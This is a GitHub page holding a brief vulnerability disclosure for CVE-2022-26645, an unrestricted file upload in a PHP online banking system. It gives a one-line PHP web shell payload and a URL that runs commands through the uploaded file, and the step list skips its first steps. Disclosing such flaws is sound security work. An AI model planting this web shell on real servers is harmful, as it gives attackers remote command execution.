Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2022-26645/
CVE/CVE-2022-26645/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Tittle: Online Banking System RCE

Author: (Erik451)

CVE: CVE-2022-26645

Vendor Homepage: https://www.sourcecodester.com/

Software Link: Online Banking System

Version: OBS 1.0

Description: Potential RCE and XSS via file upload. A user can use the upload functionality to gain access to the server crafting php code.


Steps to reproduce:

Payload used: <?php echo shell_exec($_GET['shell']);?>

phpcode

  • 3- We can see the url of the uploaded file clicking on the image zone.

upload

  • 4- Going to that url we will execute the code.

http://<ip_server>/uploads/1648559940_shell.php?shell=id rce